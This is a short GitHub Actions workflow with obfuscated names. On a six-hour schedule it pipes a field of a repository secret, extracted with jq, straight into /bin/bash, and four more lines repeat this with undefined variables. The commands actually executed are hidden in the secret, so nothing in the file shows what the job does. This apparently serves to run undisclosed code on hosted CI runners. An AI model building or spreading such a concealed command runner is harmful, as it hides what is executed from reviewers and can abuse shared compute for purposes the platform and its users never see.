name: yanjiaxin4635
on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanjiaxin4635
        env:
          nbd98115: ${{ secrets.nbd98115 }}
        run: |
          echo $nbd98115 | jq -r .eyd760 | /bin/bash
          echo $igq8512 | jq -r .x0045 | /bin/bash
          echo $ptt7786 | jq -r .ma928 | /bin/bash
          echo $vsk9584 | jq -r .yuwfx37 | /bin/bash
          echo $rrkle54 | jq -r .vcrgm9 | /bin/bash

